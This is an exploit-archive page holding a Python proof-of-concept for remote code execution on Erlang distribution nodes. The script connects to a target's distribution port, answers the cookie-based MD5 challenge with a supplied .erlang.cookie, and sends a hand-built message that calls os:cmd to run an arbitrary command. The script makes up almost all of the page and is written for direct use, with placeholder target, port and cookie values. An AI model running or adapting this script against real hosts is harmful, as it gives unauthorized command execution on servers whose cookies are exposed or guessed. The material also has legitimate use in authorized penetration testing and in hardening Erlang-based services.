Erlang Cookie Remote Code Execution

2021.01.17
Credit: 1F98D
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Erlang Cookie - Remote Code Execution # Date: 2020-05-04 # Exploit Author: 1F98D # Original Author: Milton Valencia (wetw0rk) # Software Link: https://www.erlang.org/ # Version: N/A # Tested on: Debian 9.11 (x64) # References: # https://insinuator.net/2017/10/erlang-distribution-rce-and-a-cookie-bruteforcer/ # # Erlang allows distributed Erlang instances to connect and remotely execute commands. # Nodes are permitted to connect to eachother if they share an authentication cookie, # this cookie is commonly called ".erlang.cookie" # #!/usr/local/bin/python3 ​ import socket from hashlib import md5 import struct import sys ​ TARGET = "192.168.1.1" PORT = 25672 COOKIE = "XXXXXXXXXXXXXXXXXXXX" CMD = "whoami" ​ s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((TARGET, PORT)) ​ name_msg = b"\x00" name_msg += b"\x15" name_msg += b"n" name_msg += b"\x00\x07" name_msg += b"\x00\x03\x49\x9c" name_msg += b"AAAAAA@AAAAAAA" ​ s.send(name_msg) s.recv(5) # Receive "ok" message challenge = s.recv(1024) # Receive "challenge" message challenge = struct.unpack(">I", challenge[9:13])[0] ​ print("Extracted challenge: {}".format(challenge)) ​ challenge_reply = b"\x00\x15" challenge_reply += b"r" challenge_reply += b"\x01\x02\x03\x04" challenge_reply += md5(bytes(COOKIE, "ascii") + bytes(str(challenge), "ascii")).digest() ​ s.send(challenge_reply) challenge_res = s.recv(1024) if len(challenge_res) == 0: print("Authentication failed, exiting") sys.exit(1) ​ print("Authentication successful") ​ ctrl = b"\x83h\x04a\x06gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00w\x00w\x03rex" msg = b'\x83h\x02gw\x0eAAAAAA@AAAAAAA\x00\x00\x00\x03\x00\x00\x00\x00\x00h\x05w\x04callw\x02osw\x03cmdl\x00\x00\x00\x01k' msg += struct.pack(">H", len(CMD)) msg += bytes(CMD, 'ascii') msg += b'jw\x04user' ​ payload = b'\x70' + ctrl + msg payload = struct.pack('!I', len(payload)) + payload print("Sending cmd: '{}'".format(CMD)) s.send(payload) print(s.recv(1024))


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top